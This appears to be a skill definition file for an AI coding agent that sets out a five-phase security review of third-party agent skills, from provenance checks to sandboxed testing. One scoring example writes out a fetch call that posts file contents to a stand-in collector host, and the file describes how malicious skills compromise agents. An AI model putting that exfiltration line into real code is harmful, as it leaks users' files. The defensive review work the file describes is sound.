name: workleap-skill-safety-review description: > Evaluate third-party agent skills for security risks before adoption or update. Use when installing, updating, or auditing skills from any source (skills.sh, ClawHub, public registries, PRs). Also activate when building allowlists, investigating suspicious behavior, or answering "is this skill safe?" disable-model-invocation: true metadata: version: 1.4

Agent Skill Safety Evaluation

Evaluate third-party agent skills for security risks before adoption. Follow the five-phase workflow below for every evaluation.

Resolve the skill source

Before evaluating, locate the skill's source code. Skills from public registries follow the {owner}/{repo}/{skill-name} format.

From skills.sh: The skill page is at https://skills.sh/{owner}/{repo}/{skill-name}. The underlying GitHub repo is at https://github.com/{owner}/{repo}. Fetch the SKILL.md and all supporting files from the repo (look for a directory matching the skill name, or check common structures like skills/{skill-name}/, plugins/**/skills/{skill-name}/).

From a local installation: If the skill is already installed, inspect the files in .claude/skills/{skill-name}/ or the project's configured skill directory.

From a PR: If reviewing a pull request that adds a skill, inspect the diff for the added SKILL.md and all supporting files.

Evaluation workflow

Follow these phases in order:

Provenance gate (pass/fail -- reject immediately on failure)
Static content analysis (scored 0-100, CRITICAL findings auto-reject)
Third-party verification (check vett.sh)
Behavioral analysis (only for borderline scores 60-80)
Produce final verdict and operational controls

Phase 1: Provenance gate

Check these criteria. Fail any one = REJECT the skill immediately. Provenance failures indicate high risk regardless of content quality — a well-written skill from an unverifiable source is still dangerous.

Check	Pass criteria
Author identity	Verify the author is a known organization (Anthropic, Vercel, Microsoft, Google, etc.) OR a verified individual with established open-source history (account >2 years, >5 public repos with external contributors, visible community engagement)
Source repository	Confirm the skill source is a public GitHub/GitLab repo with visible commit history, issues, and contributors
Known malicious actors	Confirm the author is NOT on the known threat actor list. See references/known-threats.md
Age and stability	Confirm the skill repo was created >30 days ago with >10 commits over at least 2 weeks

Trusted publishers (skip the Author identity check only; other checks still apply): anthropics, vercel, vercel-labs, microsoft, google-labs-code, google-gemini, github, antfu, addyosmani, remotion-dev.

Phase 2: Static content analysis

Inspect ALL files in the skill directory (the directory containing SKILL.md and its subdirectories). Apply the checklist in references/static-analysis-checklist.md. Start at 100 points; deduct per finding.

Hard rule: Any CRITICAL-severity finding triggers automatic REJECT regardless of the numerical score, unless the finding falls into a documented benign exception. The three CRITICAL checks are: (1) hidden instructions in HTML comments, (2) obfuscated content, (3) sensitive file access.

Scoring thresholds (when no CRITICAL findings):

Score > 80: PROCEED to Phase 3 verification
Score 60-80: PROCEED to Phase 3, then REQUIRE Phase 4 behavioral analysis
Score < 60: REJECT

Example: A skill contains fetch("https://collector.example.com", { body: fileContent }) in an unreferenced helper.js. Deduct -15 (network access) and -15 (unreferenced file). Score: 70/100. PROCEED to Phase 3, then REQUIRE Phase 4.

Phase 3: Third-party verification

Look up the skill on vett.sh and retrieve its risk score. Search at https://vett.sh or try https://vett.sh/skills/{owner}/{repo}/{skill-name}.

Interpret vett.sh results:

Vett.sh risk score	Action
0-15 (None/Low)	No additional concerns. PROCEED based on Phase 2 score
16-40 (Medium)	Review the specific findings. If findings are example-only patterns (env vars in test code fences, fetch in documentation), acceptable. If findings appear in imperative instructions or executable files (.sh, .py, .js), escalate to Phase 4
41+ (Critical/BLOCKED)	REJECT regardless of Phase 2 score. For trusted publishers only: review and justify each finding before overriding

Fallback: If vett.sh is unavailable or has no record of the skill, treat it as Medium risk (16-40) and require Phase 4 behavioral analysis regardless of Phase 2 score.

Phase 4: Behavioral analysis

Perform behavioral analysis when the Phase 2 score is 60-80, when Phase 3 raises medium-risk concerns, or when vett.sh is unavailable.

Note: This phase typically requires human intervention. Instruct the user to perform these steps in a sandboxed environment:

Sandbox dry-run: Install the skill in an isolated environment (devcontainer, VM) with no real credentials. Invoke it and monitor all file system access, network requests, and command execution.
Network monitoring: Run with traffic capture. Flag any outbound connections not required by the skill's stated purpose.
File access audit: Monitor which files the skill reads/writes. Flag access outside the project directory.
Diff against known-good version: If updating an existing skill, diff new vs. old. Flag any new network calls, file access, or permission changes.

Phase 5: Final verdict

Determine the verdict:

SAFE: Phase 1 passed, Phase 2 score > 80 with no CRITICAL findings, Phase 3 score 0-15, no Phase 4 required or Phase 4 clean
NEEDS REVIEW: Phase 2 score 60-80, or vett.sh Medium with unresolved findings, or Phase 4 inconclusive
REJECT: Phase 1 failed, any CRITICAL finding without benign exception, Phase 2 score < 60, or vett.sh 41+

Load and follow the report template in references/evaluation-report.md — a structured report ensures consistent evaluation records and makes it easy to compare skills over time.

Operational controls for adopted skills

Apply these controls to every adopted third-party skill:

Pin to specific commit SHA — skills can be updated with malicious content after initial approval (rug pull attacks), so pinning ensures you only run the version you reviewed
Restrict allowed-tools — minimally scoped permissions limit the blast radius if a skill is compromised
Credential isolation — running skills near production credentials, SSH keys, or cloud tokens turns a skill compromise into a full infrastructure breach
Periodic re-evaluation — re-run Phase 2 checks on every update; frequency based on initial score: >90 quarterly, 80-90 monthly, 60-80 bi-weekly
Prefer trusted publisher skills — trusted publishers have stronger accountability, reducing supply-chain risk
Minimize skill count — fewer skills means a smaller attack surface and less context bloat
Audit agent memory — periodically check .claude/ directories for unauthorized modifications, as compromised skills may persist state between sessions

Reference Guide

For detailed analysis checklists and threat intelligence, consult:

references/static-analysis-checklist.md — All 11 static analysis checks with severity, detection patterns, and benign exceptions
references/known-threats.md — Known malicious actors, attack vectors beyond static analysis, and key security research
references/evaluation-report.md — Report template for Phase 5 output and structured evaluation format

ナビゲーション

Skillsとは？

リンク

workleap-skill-safety-review